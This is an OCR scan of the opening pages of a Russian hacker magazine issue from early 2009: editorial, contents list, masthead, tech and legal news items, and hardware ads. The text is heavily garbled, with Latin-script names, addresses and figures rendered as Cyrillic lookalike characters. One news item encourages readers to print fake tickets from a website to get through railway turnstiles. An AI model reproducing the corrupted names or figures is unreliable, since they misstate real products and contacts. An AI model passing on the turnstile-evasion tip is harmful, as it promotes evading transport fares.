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ІПІГО 

Ну, что сказать о новом номере. Во-первых, можешь 
смело считать его коллекционным: Хакеру исполня- 
ется 1 0 лет, и этот номер открывает новое Х-десятиле- 
тие. Много чего было за это время, люди сменяли друг 
друга, на журнал наезжали и грозились закрыть, были 
и тупые ошибки на обложке, и сложнейшие взломы, 
и вечеринка в честь сотого номера. В будущем будем 
стараться радовать тебя еще сильнее :). 



Р.5. Сейчас думаем об Х-рагІу в честь дня рождения 
журнала. Если что — приглашение в следующем 
номере. 



Іпікііогг, гл. ред.ХІ 



ибаіііе.ііѵещигпаі.сот 




СОМТЕЫТ «01 (1 21 ) 





ВСЕ НОВОЕ ЗА ПОСЛЕДНИЙ МЕСЯЦ 




РЕККІЖ 


016 


СМОТРИ В ОБА 

СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ВЕБ-КАМЕР 



020 ѴѴІЫ00ѴѴЗ, ЭПИЗОД 7: НОВАЯ ВИСТА 

ПЕРВЫЕ ВПЕЧАТЛЕНИЯ ОТ БЕТА-ВЕРСИИ НОВОЙ ВИНДЫ 

026 СТРОИМ ША-ПРИЛОЖЕНИЕ 

НОВЫЕ ТЕХНОЛОГИИ ДЛЯ СОЗДАНИЯ 
НАСЫЩЕННЫХ ВЕБ-ПРИЛОЖЕНИЙ 

032 50І_, ИЛИ БЕЗОПАСНОСТЬ ПО МІСК030РТ 

БЕСЕДУЕМ С ИВАНОМ МЕДВЕДЕВЫМ 
О 5ЕСІІРІТѴ ОЕѴЕЮРМЕМТ ЫРЕСУСЕЕ 

036 ЭКСПЕРИМЕНТЫ С НАВИГАТОРОМ 

ПРОКАЧИВАЕМ ОБЫЧНЫЙ 6РБ-НАВИГАТ0Р 



ммввзлом» 

040 ЕА5У НАСК 

ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ 

044 ОБЗОР ЭКСПЛОЙТОВ 

КУЧКА НОВЕНЬКИХ ДЫРОК ОТ КРИСА 

048 АТАКА НА ОІР 

НИЗКОУРОВНЕВОЕ ИССЛЕДОВАНИЕ ПОПУЛЯРНОГО 
ИНТЕРНЕТ-ПЕЙДЖЕРА 

052 В СЕТЯХ СОЦСЕТЕЙ 

ХАКЕРСКИЙ ВЗГЛЯД НА СОЦИАЛЬНЫЕ СЕТИ 

056 ОХОТА НА СКРИНСЕЙВЕРЫ 

ЛОМАЕМ СКРИНСЕЙВЕРЫ С ЗО-НАГАМИ 

062 КЛАССОВАЯ БОРЬБА 

ОБЗОР УЯЗВИМОСТЕЙ В ПОПУЛЯРНЫХ РНР- КЛАССАХ 

066 ЭНЦИКЛОПЕДИЯ АНТИОТЛАДОЧНЫХ ПРИЕМОВ 

СОКРЫТИЕ КОДА В ХВОСТАХ СЕКЦИЙ 

070 Х-Т00І.5 

ПРОГРАММЫ ДЛЯ ВЗЛОМА 



072 ТАКИЕ РАЗНЫЕ ЛИКИ СЕТИ 

ВТОРАЯ ЖИЗНЬ В ИНТЕРНЕТЕ 

078 Х-5ТЦРР 

ФОТОГРАФИИ РАБОЧИХ МЕСТ ХАКЕРОВ 



юниксойд 

082 ПИНГВИН ДАЛЬНЕГО ПЛАВАНИЯ 

МЕТОДИКИ ПРОДЛЕНИЯ ЖИЗНИ НОУТБУКА 

086 ПРИРУЧЕНИЕ БЕССТРАШНОГО КОЗЕРОГА 

шцмтіі 8.Ю и кіівііытіі в.Ю: 

ОБЗОР НОВОВВЕДЕНИЙ И ВОЗМОЖНОСТЕЙ 

091 ТІРЗ'КГТКІСКЗ ИЗ АРСЕНАЛА ЮНИКСОИДА 

ТРЮКИ И СОВЕТЫ ДЯЛ ЛЮБИТЕЛЕЙ НИКСОВ 



092 В ИНТЕРНЕТ ПО-ПРОФЕССИОНАЛЬНОМУ 

ОСНОВЫ РАБОТЫ С БИБЛИОТЕКОЙ СІІРБ В ВІЛБОЕР С++ 

096 КАРТЫ, ДЕНЬГИ, КОМПИЛЯТОР 

ПИШЕМ КРУТОЙ БОТ ДЛЯ ИГРЫ В ИНТЕРНЕТ-ПОКЕР 

102 ТРЮКИ ОТ КРЫСА 

ПРОГРАММИСТСКИЕ ТРЮКИ И ФИЧИ НА С\С++ ОТ КРИСА КАСПЕРСКИ 



ш 1 1 м і м 

1 04 ТАЙНА ТРЕТЬЕЙ ПЛАНЕТЫ 

КАК ИЗУЧАЮТ ЛАЗЕРЫ 

1 08 КИЛОВОЛЬТЫ НА МЕГАГЕРЦЫ 

СОЧИНЯЕМ ИЗЛУЧАТЕЛЬ ПОМЕХ ДЛЯ ПРОТИВОКРАЖНЫХ СИСТЕМ 







112 


САМОСБОРНЫЕ ОКНА 

ѴѴАІК: БОЕКОМПЛЕКТ ДЛЯ СОЗДАНИЯ СВОЕЙ СБОРКИ ѴѴІ N Ю0ѴѴ5 


118 


КАЖДОМУ ПО ЗАПЛАТКЕ 

ПОДНИМАЕМ СЕРВЕР ОБНОВЛЕНИЙ НА БАЗЕ ѴѴІЫ2К8 И ѴѴ51І5 3.0 5Р1 


122 


ШАМАНСТВО НАД ВИЛАНАМИ 

СОЗДАЕМ ВИРТУАЛЬНУЮ ЛОКАЛЬНУЮ СЕТЬ 


128 


ЫѴЕСО: МОЩНОЕ ОРУЖИЕ ПРОФИ 

ОБЗОР живых дистрибутивов иімцх ДЛЯ СИСТЕМНОГО АДМИНИСТРАТОРА 



132 


РЗУСНО: ЛОВУШКИ НАШЕГО МОЗГА 






ПОД НАТИСКОМ ГУРУ РЕКЛАМНЫХ ПСИХОТЕХНОЛОГИЙ 


136 


РАО ІЖІТЕО 

БОЛЬШОЙ ЕАО 




139 


ДИСКО 

8,5 ГБ ВСЯКОЙ ВСЯЧИНЫ 




140 


ПОДПИСКА 

ПОДПИШИСЬ НА НАШ ЖУРНАЛ 




142 


Х-РІІ22І.Е 

ХАКЕРСКИЕ ГОЛОВОЛОМКИ 




144 


ѴѴѴѴѴѴ2 

УДОБНЫЕ ѴѴЕВ-СЕРВИСЫ 







048 



> Т ііг 


*■ 


ф 

№ 


т? 

& 


л 


» * М 


® в 


т 


в 


І ос * 


в 


А 


* 




іАТАКА 


ш 


4 


в 


* 




в 








1 ■ ІЙ*-**— 






-е- 

















! 




/Редакция 


/Агі 


/РиЫізНіпд 


>Подписка 


>Главный редактор 


>Арт-директор 


> Издатели 


Марина Гончарова 


Никита «пікііогг» Кислицин 


Евгений Новиков 


Рубен Кочарян 


(допсИагоѵа@датеІапсІ.ги) 


(пікіі 02 @геаІ. хакер. ги) 


(поѵікоѵ.е@датеІапсІ.ги) 


(поаІі@даітеІапсІ.ги) 


тел.: (495)935.70.34 


>Выпускающий редактор 


>Верстальщик 


>Учредитель 


факс: (495) 780.88.24 


Николай«догІ»Андреев 


Вера Светлых 


ООО «Гейм Лэнд» 


> Горячая линия по подписке 


(догІит@геаІ. хакер, ги) 


(зѵеІІуІт@датеІапсІ.ги) 


>Директор 


тел.: 8 (800) 200.3.999 




>Фото 


Дмитрий Агарунов 


Бесплатно для звонящих из России 


>Редакторы рубрик 


Иван Скориков 


(сІтіІгі@датеІапсІ.ги) 


> Для писем 


ВЗЛОМ 




>Управл яющий директор 


Дм итр и й«РогЬ» Докучаев 


/хакер, ги 


Давид Шостак 


1 01000, Москва, 


(1огЬ@геаІ. хакер. ги) 


(зІіозІак@датеІапсІ.ги) 


Главпочтамт, а/я 652, Хакер 


РС_20ЫЕ и ІІІМІТ5 


> Редактор сайта 


>Директор по развитию 


Зарегистрировано в Министерстве 


Степан «зіер» Ильин 


Леонид Боголюбов 


Паша Романовский 


Российской Федерации по делам 


(зІер@геаІ. хакер, ги) 


(ха@геаІ. хакер. ги) 


(готапоѵзкі@датеІапсІ.ги) 


печати, телерадиовещанию и 


ИМХОЮ, ХАКЕР.РРО и Р5УСН0 




>Директор по персоналу 


средствам массовых коммуникаций ПИ 


Андрей «АпсІгизЬоск» Матвеев 


/Реклама 


Михаил Степанов 


Я 77-1 1802 от 1 4 февраля 2002 г. 


(апсІгизІіоск@геаІ. хакер. ги) 


(зІерапоѵт@датеІапсІ.ги) 


Отпечатано втипографии 


КОДИНГ 


> Руководитель отдела рекламы 


>Финансовый директор 


«ЗсапѴѴеЬ», Финляндия. 


Александр «Ог. Кіоипіг» Лозовский 


цифровой группы 


Леонова Анастасия 


Тираж 100 000 экземпляров. 


(аІехапсІег@геаІ. хакер, ги) 


Евгения Горячева 


(Іеопоѵа@датеІапсІ.ги) 


Цена договорная. 


ФРИКИНГ 


(догуасІіеѵа@датеІапсІ.ги ) 


>Редакционный директор 


Мнение редакции не обязательно 


Сергей «ОІіпурДолин 


> Менеджеры отдела 


Дмитрий Ладыженский 


(сІІіпу)@геаІ. хакер, ги) 


Ольга Емельянцева 


(ІасІу 2 Ііепзкіу@датеІапсІ.ги) 


совпадаете мнением авторов. 


>Литературный редактор 


(оІдаетІ@датеІапсІ.ги) 


>РР-менеджер 


Редакция уведомляет: все материалы 


Дмитрий Лященко 


Оксана Алехина 


Наталья Литвиновская 


в номере предоставляются как 


(ІуазНсНепко@датеІапсІ.ги) 


(аІекНіпа@датеІапсІ.ги) 

Александр Белов (ЬеІоѵ@датеІапсІ.ги) 


(ІіІѵіпоѵзкауа@датеІапсІ.ги) 


информация к размышлению. Лица, 
использующие данную информацию 


/ОУ/О 


> Трафик менеджер 


/Оптовая продажа 


в противозаконных целях, могут 


>Выпускающий редактор 


Надежда Максимова 


>Директор отдела 


быть привлечены к ответственности. 


Степан «Зіер» Ильин 


(такзітоѵа@датеІапсІ.ги) 


дистрибуции 


Редакция в этих случаях 


(зІер@геаІ. хакер, ги) 


>Директор корпоративного отдела 


Андрей Степанов 


ответственности не несет. 


>Редактор Цпіх-раздела 


Лидия Стрекнева 


(апсІгеу@датеІапсІ.ги) 


Редакция не несет ответственности за 


Антон «АпЕ» Жуков 


(5ігекпеѵа@датеІапсІ.ги) 


>Связь с регионами 


>Редактор тематических подборок 




Татьяна Кошелева 


содержание рекламных объявлений 


Андрей Комаров 
(котагоѵ@датеІапсІ.ги) 

>Монтаж видео 

Максим Трубицын 




(козІіеІеѵа@датеІапсІ.ги ) 


в номере. 

За перепечатку наших материалов без 
спроса — преследуем. 




тѳдапѳѵг 



» 



Ме%апеѵуз 



МАРИЯ «МІРВІЦ.» НЕФЕДОВА 

/ МІГВІІ_І_@ВЕАІ_.ХАКЕР.КІІ / 



Обо всем за последний месяц 




Нежданная новинка 



Под конец года громких релизов от компании Ыокіа уже никто неждал, 

— казалось, финны презентовали все, что собирались. Поэтому новая 
модельлинии Ызегіез стала для всехсюрпризом. Новый слайдер N97 с 
большим сенсорным дисплеем 3.5" и ОѴѴЕПТѴ-клавиатурой представляет 
собой настоящий подарокдля всех интернетчиков. Тому очень способству- 
ют поддержка ѴѴіРі, ВІиеІооІЬ, 0Р5, 5-мегапиксельная камера с оптикой от 
Сагі 2еізз, 32 Гб встроенной памяти и до 1 6 Гб дополнительной (благо- 

I 



даря слоту для карттісгоЗО-слот]. Стаким набором интернет-серфинг, 
просмотр РІазЬ-видео, игры, видео и музыка — все это легко и удобно. 
Плюс Ыокіа представила концепцию «статуса в сети» — с помощью А-6Р5 
приемника и электронного компаса N97 сам определяет, где находится, и 
может отправлять эту информацию в социальные сети (авторизованные 
друзья могутс ней ознакомиться]. В продаже смартфон появится в первой 
половине 2009 года, по ориентировочной цене — 550 евро. 



ее 60 % европейского рынка нетбуков. 



Тест 

на контрафакт 

Какпоказываетпрактика, ученые — ребята не промах, 
периодически они открывают и изобретают более чем 
забавные вещи. Пальма первенства в этих вопросах явно 
принадлежитяпонцам и британцам, но испанцы тоже 
решили не отставать. Команда Университета Гренады 
измыслила самый простой и дешевый способ опреде- 
лять контрафактные СО- и ОУИ-диски. Оказывается, на 
носитель достаточно просто посветить обыкновенной 
лазерной указкой. Если дисклицензионный.то его на 
поверхности отразится лишь аккуратная точка, но если 
это продукция корсаров — отточки в разные стороны ра- 
зойдутся параллельные линии. Обусловлено это довольно 
существенной разницей в структуре дисков. Метод, в 
целом, признан надежным — в ходе его испытания было 
проверено более 100 дисков от разных производителей, 
записанных самыми разными способами и содержащих 
самые различные материалы. Тот факт, что во многих 
странах мира контрафакт штампуется на том же оборудо- 
вании, что и лицензия, испанцы, видимо, во внимание не 
принимали. 
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/12и2 Больше , чем просто 

Коек 8оИсІ - Неагі ТоисЫпд 

ѴѴІРІ-маршутиза тор ! 




АЗІІЗ ѴѴІ_-330дЕ 

Универсальная 
миниатюрная 
точка доступа 
для мобильных 
пользователей 



» 



АЗІІЗ \Л/І_-520дІІ 

ѴѴІРІ-маршрутизатор 
с точкой доступа 
1 25 Мбит/с 
и встроенным 
сервером 
печати 115В 



АЗІІЗ ѴѴЫ67д 

Компактный 115В 2.0 
адаптер 802.1 1 д 



N 




• Адаптирован для работы в сетях 
Российских Іпіегпеі - провайдеров 

• Русскоязычный пользовательский интерфейс 

• 2 порта ІІЗВ 2.0 для подключения принтера 
и жесткого диска 

• АЗІІЗ Оошпіоаб Мазіег - скачивайте файлы из сети 
Іпіегпеі, даже когда Ваш компьютер выключен 



АЗІІЗ ѴѴЫЗООд Ргетіит Ѵ.2 

1 
о 
о. 

9 

СО 

о. 
с 

С АЗІІЗ можно скачивать 
файлы из Іпіегпеі:, 
даже когда Ваш 
компьютер выключен 

Варианты соединения 




• Скорость беспроводной передачи данных до 125 Мбит/ с 

• АЗІІЗ ВгоасШапде - увеличение зоны охвата беспроводной сети 

• АЗІІЗ ЕІЗеіир - легкая настройка защищенного 
беспроводного соединения 

Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



Горячая линия А5Ц5: (495) 23-11-999 



Партнеры: Москва (495): БЮРОКРАТ (495)745-55-11; Коосіоо ТесМпоІодіеа (495) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТКІМІТѴ-ЕІ.ЕСТК0МІС5 илллл/.ігі-еі.ги; Меіго СазИ&Саггу \лмѵѵ.те(го-сс.ги; Мвидео ѵѵмлшѵісіео.ги; Медіа Магкі ѵѵш/.тесііатагкі.ги; Техносила \лллм.1есЬпо$ІІа.ги; 
Белый Ветер - ЦИФРОВОЙ 730-30-30; ЮІЧ 5-444-333; Неоторг 223-23-23; НИКС 974-33-33; Санрайз 542-80-70; СтартМастер 785-85-55; Формоза 234-21 -64; Форум Компьютере 775-77-59; Ф-Центр 105-64-47; ТепТоІсі Сгоир 580-6385; ТРК 642-47-29; Электрон-Сервис 737-44-99; НТ Компьютер 363-93-93; ІІЗИ Сотриіегз 
775-82-02; АРКИС (499) 61 2-96-90; Х-СОМ 7-999-600; Компьютер Маркет 500-03-04; 02(Мги 51 0-27-27. С-Петербург (812): КЕЙ 074; Компьютерный Мир 333-00-33; АІІРАКомпьютеры 325-69-20; К№316-І3-60;ТК-Плюс333-15-45;РИК-Компьютерс327-34-Ю. 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11; Воронеж: РЕТ (4732) 77-93-39; Владивосток: ЭИЗ (4232) 300-454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ Компьютер (343) 379-31-68; Жуковский: Байт (248) 7-41-38; Иркутск: Комтек- 
Компьютерз (3952) 258-338; Краснодар: Владос (861) 210-10-01; Красноярск: Старком (3912) 49-11-11; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега Импекс (8152)477-477; Нижний Новгород: ЮСТ (831) 225-28-23; Новокузнецк: Титан (3843) 70-38-38; Новосибирск: ЗЕТ НСК (383) 346-48-42, Техносити 
(383) 212-53-33, НТ Компьютер (383) 344-99-04; Омск: Компьюмаркет РИТМ (3812) 23-05-05; Петрозаводск: Компания «Р1» (8142) 781-323; Пермь: НТ Компьютер (342) 237-15-73; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 232-47-18, НТ Компьютер (863) 295-30-20; Солнечногорск: 
Компьютерный мир (469-26) 4-87-69; Сургут: Компьютерный супермаркет «Первый»; Томск: ИНТАНТ (3822) 56-00-56; Тюмень: Техносити (3452) 26-1 9-72; Уфа: Форте ВД (347) 260-00-00, Кламас (347) 291-21-1 2; Ярославль: Сеть компьютерных салонов «Фронтекс» (4852) 58-58-58. 








Государстве] 
лицензией Сгеагіѵе Соттопз. 



інииі 



іи более 100*000 изображений под 



Поставил \Ѵіпсіо\ѵ8, 
в тюрьму 

Черные времена настали для тех, кто подрабатывал установкой пират- 
ского софта. Теперьза это судят, притом нетолько крупныхдельцов и 
«козлов отпущения», ной простых смертных. Во Владивостоке суд вынес 
приговор местномужителю, который за дветысячи отечественных денег 
установил на четыре компьютера Місгозоіі: ѴѴі псіоѵѵз ХР и Місгозоіі: Оііісе 
ХР. Софт, естественно, пиратский, но, казалось бы, «четыре» — не совсем 
та цифра, которая могла бы привлечь внимание органов. Тем не менее, 
приговор вынесен: годлишения свободы условно и штраф в размере 1 1 7 
тысяч рублей. А ведь это — сучетом смягчающих обстоятельств, в лице 
беременной супруги и полного раскаяния. Впрочем, не стоитзабывать 
о том, что установка пиратских программ себе родимому, на свой страх 
и риск, и ихустановка клиентам за деньги — это очень разные вещи и сов- 
сем разные статьи УК РФ. 

ІЕ потихоньку утрачивает свою популярность. 

За прошедший год браузер потерял 1 . 91 % 
рынка. 





Скоро всех 
«посчитают» 

Разговоры и слухи об этом ходят уже давно, но от них все-таки решили 
перейти кделу. С 2009 года в России начнется «геномная регистрация» 
граждан — соответствующий закон вступил в силу 1 -го января. В первую 
очередь речь, конечно, идето криминалистике и о создании баз данных 
с ДНК преступников и пропавших без вести. Обязательной регистрации 
в этой связи подлежат люди осужденные, отбывающие наказание за 
совершениетяжких или особотяжких преступлений, а также преступле- 
ний против половой неприкосновенности и половой свободы личности. 
Плюс, в обязательном порядке «посчитают» и неустановленных лиц, 
чей генетический материал будет изъят в ходе следственных процедур. 
Для прочих граждан, к криминалу отношения не имеющих, возможность 
сдать генетический материал тоже предусматривается. Никто незапре- 
щаетзарегистрироваться добровольно, только вот в таком случае проце- 
дура будет платной. Выходит, бесплатно у нас собираются обслуживать 
исключительно преступников :). 



Настоящий хэдшот 

Игровая индустрия неустает стремиться к максимальной реалис- 
тичности происходящего на экране, поэтому рули и джойстики с 
вибрацией уже никого не удивляют, а лишь придают играм особен- 
ную пикантность. Но разработчики геймерских девайсов решили 
пойти дальше. Фирма ТЫ Оатез, знаменита я своими оригиналь- 
ными решениями, разнообразящими игровой процесс, предста- 
вила новинку — шлем НТХ Неітеі:, разработка которого велась уже 
довольно давно. Как несложно догадаться, шлем обеспечит около- 
реалистичные ощущения от попаданий в голову во всяческих РР5. 
В продажу «каска» поступит в 2009 году, и ее цена пока остается 
неизвестной. Учитывая, что другие продукты ТЫ 0 а тез, например, 
жилеты, преобразующие виртуальные удары в настоящие, не пере- 
ходят порога в $200, сумма должна выйти приемлемой. 
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НР РгоЫапі. 
Совершенство 




по доступной 
цене. 



НОВЫЙ ВЗГЛЯД НА ДОСТУПНОСТЬ 

Серверы НР РгоНапІ 01.120 С5 
и НР РгоНапІ 01.180 05. 
Эффективная оптимизация. 

Серверы НР РгоЫапТ всегда были известны своей надежностью / 
мощностью и эффективностью. Сегодня к списку их достоинств 
прибавилась еще и цена. 

Компактные стоечные серверы этой серии, работающие на базе 
процессоров ІпІеІ® Хеоп®, предоставят вам потрясающую 
производительность по рекордно низкой цене. 



Мощный. 

Эффективный. 




Технологии успеха в бизнесе. 




465476-421 

СЕРВЕР НР РКОЫАІЧТ РИ20 05 

Процессор ІпІеІ® Хеоп® 3065, 2,33 ГГц 
Память: 1 Гб (до 8 Гб) 

Диск 160 Гб 5 АТА (до двух 3,5" 
дисков 5АТА/ЗА5) 

Рекомендуемое расширение 
гарантии — НР Саге Раск 

Рекомендованная цена — 2 7 900 руб. 




445202-421 

СЕРВЕР НР РКОЫАІЧТ 0і\60 05 

Процессор ІпІеІ® Хеоп® 5405, 2 ГГц 
Память: 1 Гб (до 64 Гб) 

До 4 дисков 5АТА/5А5 с горячей заменой 
Рекомендуемое расширение 
гарантии — НР Саге Раск 

Рекомендованная цена — 36 300 руб. 




456831-421 

СЕРВЕР НР РКОЫАІЧТ 01180 05 

Процессор ІпІеІ® Хеоп® 5405, 2 ГГц 
Память: 1 Гб (до 16 Гб) 

До 8 дисков 5АТА/5А5 с горячей заменой 
Рекомендуемое расширение 
гарантии — НР Саге Раск 

Рекомендованная цена — 35 300 руб. 



Теперь полный спектр решений по доступным ценам! 



Позвоните: (495) 981-84-84 
Посетите: илѵѵѵ.тег5у5$.ічі 



т~гІіоп 

5Ѵ5ТЕМ 50ШТІ0М5 




© 2008 Не^ІеМ-РаскагсІ Оеѵеіортеп* Сотрапу, І..Р. Логотип ІпіеІ, ІпІеІ, Хеоп и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпІеІ 
защищены. На правах рекламы. 



территории США и других стран. Все права 




^ гтпедапеѵг 



9 декабря компания АОЬ официально прекратила поддержку ІСф-рслиента версии 5 * 1 * 



Патент на смайлик 




Воистину нет предела человеческой жадности. Ауж русская, так сказать, 
«смекалистость» и вовсе что-то вроде качества нарицательного, вошед- 
шего в сказки и байки. Лишний раз это попытался доказать ОлегТете- 
рин, президент компании «Суперфон», занимающейся мобильной рек- 
ламой — он запатентовал смайликв качестветоварного знака. Смайл ;-] 




Казнить нельзя 



помиловать 

Интересное завершение получил громкий прошлогодний скандал, 
из-за которого имя простого учителя из Пермского края Александра 
Поносова сегодня стало хорошо всем знакомо. Напоминаем, что тогда 
на всех компьютерах сельской школы, где Поносов был директором, 
обнаружили пиратские версии ѴѴіпсІоѵѵз. Была проведена экспертиза, 
и ее итог вышел для учителя совсем неутешительным — ущерб из-за 
использования нелицензионных версий программ составил 250.000 
рублей. Поносова осудили, приговорили к штрафу, а его лицо мелька- 
ло по всем телеканалам, чтобы не оставалось сомнений — в России 
борются с пиратством. Уже позже, в ходе визита в Москву, Стив Балмер 
с грустью комментировал ситуацию, уверяя, что МісгозоЛ не имеет к 
этому никакого отношения и более того — предоставляет всяческие 
льготы и специальные программы для учебных заведений. Однако факт 
остался свершившимся фактом. Теперьже, спустя год препирательств 
с властями и новых заседаний, Пермский краевой суд рассмотрел 
надзорную жалобу Поносова и вынес решение ее удовлетворить. 

Таким образом, исходный приговор Верещагинского суда все же был 
отменен, а уголовное дело закрыли за отсутствием состава преступле- 
ния. Поносов больше не пират, и он получил право на реабилитацию, 
которым, по его словам, собирается воспользоваться. 



присутствует в логотипе и названии фирмы и запатентован был весь ло- 
готип целиком. Но господин Тетеркин не растерялся итутже заявил, что 
все схожие обозначения, то есть — :-), ;), :]тоже нельзя использовать в 
коммерческих целях. А нарушителей он намерен преследовать по закону 
и взыскивать с них штрафы. Полетего фантазии простерся весьма да- 
леко, припомнилисьдажетакие громкие имена как«Корбина Телеком», 
ЫезЛе и «Макдональдс» — все эти фирмы, так или иначе, используют в 
своей рекламе смайлы. Но сбыться мечтам о миллионах долларов (да, 
речь шла именно отаких суммах штрафов) было не суждено. Во-первых, 
это уже не первая попытка запатентовать смайлики; во-вторых, ситуа- 
цию оченьжестко пресекли представители «Роспатента», заверив всех, 
что сам по себе смайлик не может индивидуализировать производителя 
и являтьсятоварным знаком, а стало быть, ни о каких компенсациях 
речи тоже идти не может. Скорее всего, господин Тетеркин так просто 
не отступится и все же попытается кого-нибудь засудить, но вряд ли его 
затея увенчается успехом. Представители упомянутых выше компаний 
и владельцы других крупных фирм, замеченные в использовании «улы- 
бок», уже подняли его заявления на смех. 



Регистрация кириллических доменов в 
зоне «.рф» откроется для пользователей в 

конце 2009 года. 



С падонковского 
на русский 



статьи содержат 
ненормативную лек- 
сику, АВВУУ заранее 
предупреждают, что 
«продукт ориенти- 
рован на совершен- 
нолетних пользо- 
вателей с чувством 
юмора и устойчивой 
психикой». 




Любой сленг, к какой бы среде он ни относился, штука весьма специ- 
фичная. Ауж сегодняшний сетевой сленг для неискушенного чело- 
века и вовсе является настоящим кошмарным сном. Оставлять этот 
быстро растущий сегмент языка без внимания было бы, как минимум, 
странно, так что, выпуская словарь Біпдѵо ХЗ МЕ, компания АВВУУ 
явно не прогадала. МЕ здесь расшифровывается как МебѵесІ ЕсІіЕоп, 
но словарь содержит нетолько олбанский и прочий сетевой жаргон 
и его дешифровки. Помимоэтого пользователь сможет ознакомить- 
ся с нюансами сленга одесситов, ІТ-шников, бизнесменов и даже с 
женско-мужским 
словарем. Уникаль- 
ный сборникжарго- 
низмов различных 
субкультур выпущен 
ограниченным 
тиражом, по цене 
490 рублей. В виду 
того, что многие его 
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Многочисленные призы 
от АІріпе 



Махі Касіпд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Васіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Мебіа от АІріпе, страховку РОСНО на свое авто. 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХІ КАСІІМС. ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте \ллллл/.тахі-гасіпд.ги и \лл/ѵѵѵ.тахі-1:ипіпд.ги 



РОСНО 



в составе АПіапг @) 



тзп 
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Впервые за много лет пользователей ОС семейства 1 
числа: показатель упал до 89.62%і 



ю менее 



90% от общего 



Борьба с билетами 



# БІ1ЛЕТЛ МНЬТ 




В СШАза порядком следитантимонопольная комиссия, а в России с 
монополистами периодически порываются бороться самостоятельно. 
На сей раз народный гнев вызвало ОАО РЖД («Российский Железные 
Дороги»), установившее на станцияхтурникеты. «Благодаря» им, на 
платформу без билета попасть невозможно и также невозможно с нее 
без билета выйти. Сайт борцов с этой вопиющей несправедливостью 
— ѵѵѵѵѵѵ.ЫІеІат.пеІ — предлагает изящное решение. Здесь можно 
сгенерировать и распечатать себе «билет», по которому никуда уехать 
не получится (предъявлять подобную поделку контролерам крайне 
не рекомендуется), а вот пройти с его помощью через турникеты к 
поездам и покинуть платформу — можно будет без проблем. И главное, 
совершенно бесплатно! Интересно, что вся эта затея основывается 
на решении Мещанского суда г. Москвы о незаконности турникетов, 
согласно статье 27 Конституции РФ. То есть, о легальности или неле- 
гальности таких «проходок» можно спорить довольно долго. А пока 
тянутся споры, ты, дорогой читатель, когда тебе придется в очередной 
раз ехать на вокзал, встречать тетушку с огромными баулами, вместо 
того чтобы покупать «билет на вход» и «билет на выход» и стоять в 
очередях, можешь просто вспомнить об этом ресурсе. 



Спамеры-миллиардеры 



Какотвадить спамеров от социальных сетей? Над 
этим вопросом ломают головы по всему миру, но даже 
самые суровые наказания назойливых рекламщиков, 
похоже, не пугают — слишком ужлакомый кусочек 
представляют собой соц. сети. Компания РасеЬоок не 
отстает от коллег по цеху, борясь с нежелательными 
рассылками кактолько можно. Недавно РасеЬоок 
выиграла судебный процесс против спамера Адама 
Гуэрбеза (Абат СиегЬиег) из Канады. Но интересен в 
данном случае не сам факт, а сумма штрафа, к которой 
последнего приговорили. Она составила ни много, ни 
мало $873 млн. Для сравнения — доходы всей компа- 
нии РасеЬоок за 2008 год не превышают $300 млн. Сам 
Гуэрбез, разославший пользователям РасеЬоок более 4 
млн. спам-сообщений, в которых рекламировал все что 
угодно, включая марихуану и порнографию, уже четыре 
месяца находится в розыске. Согласно материалам 
дела, он исчез сразу послетого, как против него подали 
иск. В РасеЬоок надеются, что сумма штрафа хотя бы 
отпугнет от социальной сети других дельцов нелегаль- 
ной рекламы, однако верится в это струдом. 




Иногда они возвращаются 



раіт 



Очень давно не было слышно 
ничего нового от компании Раіт, 
но она, тем не менее, жива и все 
еще пытается как-то поправить 
свое положение. И, похоже, все 
может получиться; во всяком 
случае, многие аналитики при- 
шли именно ктакому выводу. В 
пользу этого заключения говорят 
сразу несколько вещей. Напри- 
мер, в Раіт сейчас собрался дружный коллектив бывших сотруд- 
ников Арріе — притом, далеко не последних, и компания объявила 



о скорой презентации новой мобильной ОСи под названием Раіт 
ІМоѵа. Напомним, что последняя ОСь от Раіт вышла целых шесть лет 
назад — это была Раіт 05 5. Публике ІЧоѵа продемонстрируютуже в 
этом месяце, а в течение 2009 года на ее базе планируется выпустить 
несколько моделей смартфонов. Загадочные новинки будутявлять 
собой нечто среднее между деловым ВІаскВеггу и развлекательным 
іРЬопе, и перед ними ставится амбициозная задача «отвоевать» 2% 
мирового рынка смартфонов. Плюс, компания открыла свой магазин 
мобильных приложений, по аналогии с Арр 5іоге. Уже сейчас там 
насчитывается более пяти тысяч различных программ и програм- 
мок, порядка двух тысяч из которых бесплатные. Что из всего этого 
получится, — скоро узнаем! 



► 010 



ХАКЕР 01 /121/ 09 





реклама 




ЕКІТНІІЗІАЗТ 

ІІЧТЕКЫЕТ 

АѴѴАРЮ 

2008 



ОРГАНИЗАТОР 



ппзп.ги 



генеральный спонсор 



піго://еіа.тзп.ги 



(дате)Іапа 



* Зи _ * ! ■ 5 

«X* 1 I*!*»*!" 

ѵѵХ* я !*а # 1*в я 

: ::'= ЗДВДЗв 

■; , •.*!• <!*і*1*2ч* 

* - !;к$: 

*!*!*.■ 






Первый в России конкурс 
ѵѵеЬ-проектов среди энтузиастов 

Во все времена самые прекрасные шедевры создавались энтузиастами. Ведь это 
люди, которые делают своё любимое дело - не ради зарплаты и не для начальства, 
а ради себя и для таких же, как они - Гог епГГіизіазГз Ьу епІГіизіазГз. Каждый из 
них смотрит на Мир своими глазами и хочет донести до остальных свой взгляд - 
свои мысли и эмоции. Никто и никогда не сделает дело так хорошо, как человек, 
